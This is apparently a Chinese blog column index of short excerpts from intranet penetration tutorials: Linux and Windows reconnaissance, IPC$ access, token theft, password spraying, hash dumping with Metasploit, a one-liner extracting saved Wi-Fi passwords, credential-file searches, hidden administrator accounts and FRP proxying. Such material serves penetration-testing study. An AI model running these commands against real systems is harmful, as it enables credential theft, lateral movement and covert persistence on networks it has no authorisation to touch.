内网渗透
文章平均质量分 62
内网信息搜集
横向拓展
Beyond My
你说,有些路,从你启程的那一刻起,便知道自己注定会到达...
展开
-
内网渗透_信息搜集(Linux)
Linux 信息搜集Linux信息搜集脚本:1、地址:https://github.com/rebootuser/LinEnum2、用法:上传到 /tmp目录下,然后赋予权限运行即可手工收集1、查看端口状态(服务、内网IP连接等)netstat -anpt2、查看进程状态ps -ef 或者 ps -auxtop3、查看文件(获取密码、网站目录、资产信息等)1)查看历史命令:cat /root/.bash_history2)查看passwd文件:cat /etc/pas原创 2022-04-21 11:25:42 · 5425 阅读 · 0 评论 -
内网渗透_IPC
内网渗透_IPC0x01. 什么是IPCIPC(共享命名管道资源)其实就是为了实现进程间通信而开放的命名管道;IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源使用简单理解:可以访问目标机器上的文件(上传、下载),也可以在目标标机器上运行命令上传和下载文件直接通过 copy 命令就可以,不过路径缓存 UNC 路径什么是UNC路径?就是以 \ 开头的路径就是UNC路径,比如:\\10.10.10.10\c$\users0x02. IPC的利用条件开启了1原创 2022-04-07 19:28:31 · 5041 阅读 · 4 评论 -
内网渗透_令牌窃取
内网渗透_令牌窃取0x01. 令牌简介令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动0x02. 访问令牌的分类授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌⾯等)模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件)两种 token 只有在系统重启后才会清除;授权令牌在用户注销后,该令牌会变为模拟令原创 2022-04-07 12:33:20 · 1394 阅读 · 0 评论 -
内网渗透_密码喷洒攻击
密码喷洒攻击0x01. 背景⼀般我们我们与目标内网建立了 socks5 隧道后,就可以从域外(这⾥指的是我们攻击的机器)对域内机器进行密码喷洒了,前提是已经通过信息搜集或者抓密码得到了⼀批密码,我们就可以通过得到的密码来对域内进行密码喷洒0x02. 工具与方法1. CrackMapExec 对域内进行密码喷洒CrackMapExec(⼜名 CME)是⼀款非常好用的密码喷洒攻击的⼯具,在 Kali Linux 默认已经安装好。1.2. 下载地址:https://github.com/byt3bl3原创 2022-03-28 16:52:06 · 8115 阅读 · 0 评论 -
内网探测(主机存活、端口、Web资产)
内网探测(主机存活、端口、Web资产)当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集、IP 段搜集、端⼝开放服务、Web资产数量、漏洞类型0x01. Fscan介绍:Fscan 是⼀款内网综合扫描⼯具,方便⼀键自动化、全方位漏扫扫描。⽀持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。fscan 下载地址:h原创 2022-03-25 16:07:12 · 11049 阅读 · 0 评论 -
MSF抓取密码
MSF抓取密码导出密码哈希run hashdump命令 hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限在meterpreter_shell中执行run hashdump命令命令:run hashdump用户哈希数据的输出格式为:用户名:SID:LM哈希:NTLM哈希:::3. run windows/gather/smart_hashdump命令 run windows/gather/smart_hashdump命令的使用需要系统权限。该原创 2022-03-24 19:45:01 · 1745 阅读 · 0 评论 -
内网信息收集补充(Windows)
内网信息收集补充1. 获取电脑上连接过Wifi的账号密码1)cmd命令for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear2)python脚本# -*- coding: UTF-8 -*-import osimport importlib,sysimpor原创 2022-03-24 15:05:48 · 410 阅读 · 0 评论 -
FRP三层代理实验
环境简介**0x01. Win Server2012**1. ip_1:192.168.0.1542. ip_2: 10.10.20.12(仅主机模式)3. user/passwd : Administrator:Admin12345**0x02. Win 7**4. ip_1: 10.10.20.7(仅主机模式)5. ip_2: 10.10.10.7(仅主机模式)6. 本地管理员:john:admin!@#45 域账户:redteam\saul:admin!@#45*原创 2022-03-22 17:49:36 · 2127 阅读 · 0 评论 -
CFS三层靶机渗透_Kali版
环境搭建0x01. 环境下载:【CFS三层靶机环境】百度网盘链接:链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg提取码: dkcp解压密码:teamssix.com0x02. 环境搭建:1)设置虚拟机网卡(新建两个仅主机模式的网卡)VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.02)虚原创 2022-03-18 18:34:12 · 5680 阅读 · 0 评论 -
mysql_udf提权
0x00. 环境配置:安装phpstudy,并且以系统服务模式启动创建普通用户在服务中将Apache以普通账户启动赋予apache目录下logs普通账户写入权限连接大马,测试下当前我们的权限0x01. UDF介绍与使用:什么是udf:udf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数为了在mysql中使用此原创 2022-03-05 17:48:27 · 3218 阅读 · 0 评论 -
二、低权限下的信息收集
切换目录:1)pwd2)cd C:\User\admin搜索当前目录下的敏感文件1)shell dir /b /s user.*,pass.*,config.*,username.*,password.*2)for 循环搜集当前机器各类敏感密码配置⽂件还可以通过 for 循环来查找,例如查找匹配 pass ⽂件:shell for /r c:\ %i in (pass.*) do @echo %i3)findstr 命令查找某个⽂件的某个字段上⾯两条命令只是查找某个⽂件..原创 2022-02-14 21:35:54 · 223 阅读 · 0 评论 -
一、内网信息收集
内网信息收集0x01、判断是否在域内?1)ipconfig /all看主DNS后缀有域:无域:2)systeminfo看域有域:无域:3)net config workstation查看登陆域有域:无域:4)net time domain查看域时间0x02、工作组信息收集1)ipconfig /all 查看网络信息2 )查看系统版本:systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"3)查看体系结构:echo %PRO原创 2022-02-13 17:43:40 · 770 阅读 · 0 评论 -
ssh免密登录
ssh免密登录1、简洁操作主机A免密码登录主机B:将A的公钥上传到主机B1.1、 在主机A创建密钥对ssh-keygen #创建证书#然后均回车(选择默认)1.2、将公钥文件上传至免登录主机Bssh-copy-id -i ~/.ssh/id_rsa.pub -p 50028 [email protected](端口不是22的情况)ssh-copy-id -i ~/.ssh/id_rsa.pub 192.168.198.1321.3、注意:前提是得知道主机B的账户密码(原创 2022-01-03 12:22:44 · 8297 阅读 · 0 评论 -
Linux提权
一、Linux信息收集:LinEnum脚本地址:https://github.com/rebootuser/LinEnum介绍:用法:上传到 /tmp目录下,然后运行即可二、Linux漏洞探测:5. Linux-exploit-suggester脚本6. 地址:https://github.com/mzet-/linux-exploit-suggester7. 介绍:8. 用法:上传到 /tmp目录下,然后运行即可三、Linux漏洞探测:9. Linux-exploit-su原创 2022-01-03 11:46:05 · 859 阅读 · 0 评论 -
内网渗透(克隆用户)
内网渗透(添加隐藏账户、克隆账户)1. 普通添加用户net user test 123456 /addnet localgroup administrators test /add2. 添加隐藏用户(注册表,D盾可查出)只是对 net user 隐藏了,开机登陆用户时会显示出隐藏用户名!net user test$ 123456 /addnet localgroup administrators test$ /add1)注册表中可查到2)控制面板用户账户也能查到3)计算机管理(右原创 2021-12-27 23:17:18 · 1964 阅读 · 0 评论 -
内网渗透(Frp代理)
Frp代理1. Frp内网穿透使用教程(无配置文件版)** 1)文件介绍:Frps:服务端运行文件Frpc:客户端运行文件** 2)服务端运行:frps -p 9090开启监听9090端口:** 3)客户端运行:frpc.exe -f 9091 -p 9090 -t 103.52.153.194** 4)代理端配置:注意:端口是内网执行中-f后的参数值** 5)代理成功如下:...原创 2021-12-26 15:55:55 · 1304 阅读 · 0 评论 -
内网渗透(MSF和计划任务)
内网渗透(MSF和计划任务)原创 2021-12-26 15:49:12 · 1137 阅读 · 0 评论 -
内网渗透(抓取明文密码)
内网渗透--抓取密码原创 2021-12-26 15:41:47 · 1193 阅读 · 0 评论